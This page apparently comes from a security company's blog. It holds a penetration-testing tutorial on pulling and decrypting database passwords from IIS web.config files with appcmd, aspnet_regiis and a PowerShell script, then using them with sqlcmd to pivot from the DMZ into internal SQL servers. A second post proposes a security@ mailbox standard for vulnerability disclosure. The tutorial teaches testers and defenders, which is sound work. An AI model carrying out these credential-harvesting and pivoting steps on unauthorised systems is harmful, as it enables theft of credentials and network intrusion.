If you enjoy these, be sure to make it out to Secure360 this year as Karl will be presenting as well as co-instructing a full-day class on “An Introduction to Penetration Testing” along with NetSPI Principal Consultant Scott Sutherland.
To learn more about Secure360, Karl’s presentations, or information on how to sign up for the training please visit the pages below:
From the perspective of a penetration tester, it would be nice if every vulnerability provided a direct path to high-value systems on the internal network. However, the reality is that we aren’t always that lucky, and sometimes we land on an application server in the DMZ network first. In this blog I’ll cover how to use native IIS tools to recover encrypted database passwords from web.config files and leverage them to break into the internal network from the DMZ. This should be interesting to penetration testers, developers, and system administrators trying to gain a better understanding of the value and limitations of passwords encrypted in IIS configuration files. Below is an overview of what will be covered.
Web.config is an XML configuration file that is used to control ASP.NET servers, applications, and pages. As an attacker, web.config files are incredibly valuable because they often contain connection strings that can be used to access databases on the internal network. Usually holes are poked through the DMZ firewall that allows the application server to access backend database servers. So connecting through the firewall boundary usually isn’t a problem. Once the attacker has successfully connected to a database server on the internal network it is possible escalate to the operating system level and in a few short steps obtain Domain Admin privileges. Below I’ll cover how to find and decrypt connection strings in web.config files.
Finding web.config Files
Before the connection strings can be extracted, the web.config files will need to be located. They can be found in multiple locations, but are typically located in the web root of each application directory. For example: “c:inetpubwwwrootMyAppweb.config”. As it turns out, IIS application directories are not always in the inetpub directory, and may not be located on the C drive at all. Thankfully there is a native command that can help. The appcmd.exe command is installed along with IIS 7 and can search, view, and modify IIS configurations (assuming you’re an admin). So we can run the command below to find the application directories we are looking for.
%windir%system32inetsrvappcmd list vdir
From there it’s possible to quickly recursively search the directories for web.config files with the command below:
dir /s /b c:MyTestSite | find /I "web.config"
Finding Connection Strings in the web.config
Now that we know where the web.config files are, we can start searching for connection strings. Luckily they are pretty easy to find because they are contained within the “connectionstrings” XML tag. Below is a basic example of what an unencrypted connection string might look like in a web.config file.
Appcmd can be used to streamline the recovery of connection strings if they are not encrypted. Below is a little script example:
for /f %i in ('%systemroot%system32inetsrvappcmd list site /text:name') DO %systemroot%system32inetsrvappcmd list config "%i" -section:connectionstrings
Decrypting Connection Strings in the web.config
From an attacker’s perspective it’s nice if connection strings are not encrypted. The reality is that it’s becoming more and more common for the strings to be encrypted (which is good for admins). Encrypting web.config files is useful for protecting connection strings when they have been backed up. However, once an attacker has administrative access to an IIS server it is possible to use the same methods the developers use to decrypt the connection strings. Aspnet_regiis.exe is another native tool which is installed by default with .Net for IIS. In this example we are going to use it to decrypt our web.config. Below are the basic steps.
1. Copy the web.config out of the application directory.
copy "c:inetpubwwwrootMyAppweb.config" c:temp
2. View the file to verify the connection strings are encrypted. The connection strings should be encrypted in the “cipherdata” and “ciphervalue” tags within the “connectionStrings” tab.
3. Decrypt the connection string in the web.config with aspnet_regiis.exe. Make sure to use the most recent version found in the Framework folder. The newest version is typically backwards compatible and should be able to decrypt connection strings that were encrypted with an older version.
4. Recover the unencrypted connection strings from the web.config file. The cleartext connection strings should look like the example shown in the last section.
To automated the entire process I’ve write a small Powershell script called “get-webconfig.ps1” with Antti Rantasaari. It can be downloaded from github HERE. It’s also been added to the Posh-SecMod Powershell project owned by Carlos Perez. The toolkit has a ton of handy scripts for all sorts of things – go check it out at https://github.com/darkoperator/Posh-SecMod. Ok, back on track…
Don’t forget to run as an administrator or system. Below is an example of the output. It will show the username, password, database server, IIS virtual directory, full path to the web.config, and indicate if it was found encrypted.
PS C:>get-webconfig.ps1 | Format-Table -Autosize user pass dbserv vdir path encr ---- ---- ------ ---- ---- ---- s1admin s1password 192.168.1.101server1 C:App1 C:App1web.config No s1user s1password 192.168.1.101server1 C:inetpubwwwroot C:inetpubwwwrootweb.config No s2user s2password 192.168.1.102server2 C:App2 C:App2testweb.config No s2user s2password 192.168.1.102server2 C:App2 C:App2web.config Yes s3user s3password 192.168.1.103server3 D:App3 D:App3web.config No
Connecting to the Backend Database
Now that we have decrypted the database connection strings let’s use them. In most cases, web applications hosted on an IIS server connect to a Microsoft SQL Server on the backend. In some cases the command line SQL client tools are already installed on the IIS server. Those can be leveraged to access the database without too much effort. Below are some basic examples.
isql.exe –S PRDSRV1 –U sa –P Password1 –Q “SELECT name FROM master..sysdatabases”
osql.exe –S PRDSRV1 –U sa –P Password1 –Q “SELECT name FROM master..sysdatabases”
sqlcmd.exe –S PRDSRV1 –U sa –P Password1 –Q “SELECT name FROM master..sysdatabases”
If command line SQL clients are not on the server, then PowerShell can be used to accomplish the same goal. Antti Rantasaari made a great web shell that will do all of this for you. He also wrote a nice little blog to go with it that you can find here. Below is a basic example showing how to list all of the databases on the remote server if you want to experiment on your own. However, during a real attack you would most likely use the xp_cmdshell and xp_dirtree stored procedures to pivot into the internal network. Antti and I put together a presentation a while back the covers those topics in more detail. You can download it from slideshare here.
Encrypting passwords in the web.config does help reduce risk related to read-only attacks and access to backup files. However, if an attacker is able to gain administrative access to a system they will be able to use administrative tools or Windows APIs such as crypt32.dll to decrypt protected passwords. As a result, attackers may be able to break out of the DMZ zone and into the internal network. That is why it is very important to also make sure that all accounts are configured with least privilege, proper network zone isolation is enforced, and sensitive accounts are being audited. Hopefully this was helpful. Have fun and hack responsibly!
I present you with RFC2142, please take a minute to skim through it for a little context. This RFC aggregates all of the recommended mailbox names that network and computer operators should setup depending on what public services they offer (You did setup and continue to monitor important mailboxes like postmaster, abuse, and so on, right?). The idea behind this is, if someone has a mail issue, they can just email POSTMASTER@domain.tld. If there is an issue with the website, send it to WEBMASTER@domain.tld. Having these predefined mailboxes takes all the thought out of the process, and saves people from having to pick up the phone, or start hunting around the website for a contact form, and just send the message and get on with their day. People have become lazy regarding these best practices, so this blog is also to raise awareness about that particular practice as well.
So how does this relate to security, you ask? One of the dumb problems in the security industry is that there isn’t a standard way to disclose vulnerabilities to vendors or to network operators. Unless you have some sort of existing relationship with the company, or they go above and beyond in terms of security responsiveness (which is almost nobody), you start pitching your vulnerability disclosure into various e-mail boxes, snailmail letters, voicemail boxes, etc. More times than not, the information doesn’t make it to the right person, so you end up disclosing. When the bad press happens to catch someone’s attention, they get upset because you didn’t tell them about the problem first. It’s a lose-lose situation for everyone involved.
My suggestion is to resurrect good internet stewardship, and start standardizing on the SECURITY@domain.tld for vulnerability and security disclosure. The above RFC was written in 1997 and includes this mailbox under section 4 “NETWORK OPERATIONS MAILBOX NAMES,” so at least there is existing precedent for this naming convention. I suggest we expand the scope a little and use that mailbox for any security related topic. This can include, but is not limited to:
Vulnerabilities on a website
Vulnerabilities in software distributed by that company
Vulnerabilities in services offered by the company
Vulnerabilities on a public facing network or system that is maintained by that company
Publicly leaked information on a websites like pastebin
Sensitive documents blowing in the parking lot
What you do with the mailbox is up to you, but here are some ideas:
Have an employee check this box once in a while, and manually distribute the messages to those that need the information.
Create a secondary mailbox in Exchange that people can attach to and have your infosec department manage the mailbox.
Create a distribution group or mailing list with key members of your organization subscribed.
Have a ticketing system monitor the mailbox and create cases or tickets automagically when something comes in.
While we’re talking about standardizing vulnerability disclosure, lets put together some high-level process objectives we could all strive to attain:
All messages received on SECURITY@domain.tld should send an auto-reply back to the user immediately thanking them for their submission, and include a URL to a page with more information about that company’s vulnerability process. (We could even standardize the URL, how about something like www.domain.tld/security/?)
Within no more than 7 calendar days, the vendor MUST send a response back to the vulnerability submitter. The response should contain a case or ticket number they can reference in the future and a means of communication to check up on the status of the vulnerability. This gives the vendor an opportunity to accept the vulnerability as legitimate and issue a case or ticket number, and drop all other spam messages without assigning case numbers to bogus requests or spam messages. If no ticket number is issued within 72 hours for any reason at all, the submitter is free to disclose publically. If the submission is granted a ticket number, a three-month gag order and moratorium starts. The submitter should be reasonable and grant more time if the vendor gives a valid reason. For example, if the vulnerability were so widespread that a vendor would have to rewrite the entire application from the ground up, 3 months wouldn’t be enough time.
Once 3 months (or whatever the agreed upon time frame) is up, the vulnerability submitter is free to speak, blog, tweet about the vulnerability as they see fit. Once the gag timer expires, the submitter’s responsibility is terminated.
I realize this is a lofty idea that will get ignored, but I can dream. Thoughts, comments, and ideas on this are all greatly appreciated. Have you implemented something similar in your organization? Let me know in the comments how it worked for you.
UPDATE: since the release of this blog, a couple new standards have been released. ISO 24197, and ISO 30111 have been released for public consumption. I’ve not read either of these standards, but they should be reviewed by organizations when writing their vulnerability disclosure and handling policies.
Necessary cookies help make a website usable by enabling basic functions like page navigation and access to secure areas of the website. The website cannot function properly without these cookies.
YouTube session cookie.
Marketing cookies are used to track visitors across websites. The intention is to display ads that are relevant and engaging for the individual user and thereby more valuable for publishers and third party advertisers.
Analytics cookies help website owners to understand how visitors interact with websites by collecting and reporting information anonymously.
Preference cookies enable a website to remember information that changes the way the website behaves or looks, like your preferred language or the region that you are in.
Unclassified cookies are cookies that we are in the process of classifying, together with the providers of individual cookies.
Cookies are small text files that can be used by websites to make a user's experience more efficient. The law states that we can store cookies on your device if they are strictly necessary for the operation of this site. For all other types of cookies we need your permission. This site uses different types of cookies. Some cookies are placed by third party services that appear on our pages.
Discover why security operations teams choose NetSPI.